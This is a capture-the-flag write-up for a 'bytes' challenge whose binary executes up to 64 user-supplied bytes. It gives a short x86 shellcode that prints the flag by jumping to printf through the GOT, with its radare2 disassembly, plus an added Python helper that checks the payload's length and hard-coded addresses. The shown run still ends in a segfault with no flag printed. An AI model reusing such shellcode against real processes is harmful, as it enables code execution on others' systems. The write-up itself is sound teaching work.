The Problem

Our operatives found this site, which appears to control some of the androids’ infrastructure! The robots love x86 assembly; the only thing easier for them to work with is binary. 64 bytes should be enough for anyone.
This URL is unique to your team! Don’t share it with competitors!

The link contains:

Download bytes challenge binary.

You can send up to 64 bytes (hex encoded) as the first argument to the binary. The passed in bytes will be executed. The goal is to read the contents of the file in env['WUNTEE_CHALLENGE_FLAG'].

Run your input here: [submit field]

Upon entering anything, the following is displayed:

Shellcode location: 0xf77b8000
Flag location: 0xfff16460
Status: pid 156 SIGSEGV (signal 11) (core dumped) 

The Solution

Luckily, the binary has been provided. Per the challenge prompt, and as confirmed with Radare2, the binary accepts up to 64 hex-encoded bytes. If more than 64 bytes are entered, the binary prints “The input you provided was bad.”

The binary reads the environment variable “WUNTEE_CHALLENGE_FLAG,” which is a path to a file. The file contains the flag. If the environment variable is not set, the program will print “%s environmental variable not set. Could not read flag.\n” and exit. However, if the environment variable is set, the program will segfault at 0x080488ec.

./bytes aa
Shellcode location: 0xf773a000
Flag location: 0xffa70c40
Segmentation fault

The last valid instruction the binary executes is at 0x080488ec and is jmp dword [local_18h]. local_18h holds the address of the user input, so control transfers directly into the bytes we supplied. For example, if 90 was passed to the binary, the program would execute nop. In order to print the flag, shellcode (x86 assembly) needs to be written that prints the contents of the file named in “WUNTEE_CHALLENGE_FLAG.”

The shellcode

0xf7706000 00:0000      90             nop
0xf7706001 00:0000      83c410         add esp, 0x10
0xf7706004 00:0000      54             push esp
0xf7706005 00:0000      681c8a0408     push str.Shellcode_location:__p_n ; 0x8048a1c ; "Shellcode location: %p\n"
0xf770600a 00:0000      ff258c9c0408   jmp dword [reloc.printf_140] ; 0x8049c8c ; "0yW\xf7\xf0\xbcX\xf7"

This shellcode (9083c41054681c8a0408ff258c9c0408) adjusts esp so that it points at the file contents, pushes that esp value, then pushes the address of a string already present in the binary, and finally jumps to printf through its GOT entry (reloc.printf_140). Because the last instruction is a jmp rather than a call, no return address is placed on the stack, which is why the process still ends in a segfault once printf returns.
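As an added sanity check (not part of the original writeup), the following Python parses the radare2 listing above, reassembles the hex string, confirms it is within the 64-byte limit, and extracts the absolute addresses the payload hard-codes, which is why it only works against this non-PIE binary. The listing text is a constructed copy of the five lines shown.

```python
import re
import struct

# Constructed copy of the five radare2 lines shown above (not re-captured).
R2_LISTING = """\
0xf7706000 00:0000      90             nop
0xf7706001 00:0000      83c410         add esp, 0x10
0xf7706004 00:0000      54             push esp
0xf7706005 00:0000      681c8a0408     push str.Shellcode_location:__p_n ; 0x8048a1c
0xf770600a 00:0000      ff258c9c0408   jmp dword [reloc.printf_140] ; 0x8049c8c
"""

MAX_INPUT_BYTES = 64  # the challenge's stated input limit

# address, radare2's seg:off column, the opcode-hex column, then the text
_LINE = re.compile(r"^(0x[0-9a-f]+)\s+\S+\s+([0-9a-f]+)\s+(.*)$")


def parse_listing(listing):
    """Return [(address, opcode bytes, mnemonic text)] for each instruction line."""
    rows = []
    for line in listing.splitlines():
        m = _LINE.match(line.strip())
        if m:
            addr, opcodes, text = m.groups()
            rows.append((int(addr, 16), bytes.fromhex(opcodes), text.split(";")[0].strip()))
    return rows

def is_contiguous(rows):
    """True if every instruction starts exactly where the previous one ended."""
    return all(a + len(c) == b for (a, c, _), (b, _, _) in zip(rows, rows[1:]))

def shellcode_hex(rows):
    """Join the opcode bytes in address order: the hex string the challenge takes."""
    return b"".join(code for _, code, _ in sorted(rows)).hex()

def fits_limit(hexstr):
    return len(bytes.fromhex(hexstr)) <= MAX_INPUT_BYTES

def absolute_immediates(rows):
    """32-bit immediates from 'push imm32' (0x68) and 'jmp dword [abs32]' (ff 25).
    These are fixed addresses inside the binary; a PIE build would randomise them."""
    found = []
    for _, code, _ in rows:
        if len(code) == 5 and code[0] == 0x68:
            found.append(struct.unpack("<I", code[1:])[0])
        elif len(code) == 6 and code[:2] == b"\xff\x25":
            found.append(struct.unpack("<I", code[2:])[0])
    return found
```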

root@kali:bytes# ./bytes 9083c41054681c8a0408ff258c9c0408
Shellcode location: 0xf7793000
Flag location: 0xffe44560
Segmentation fault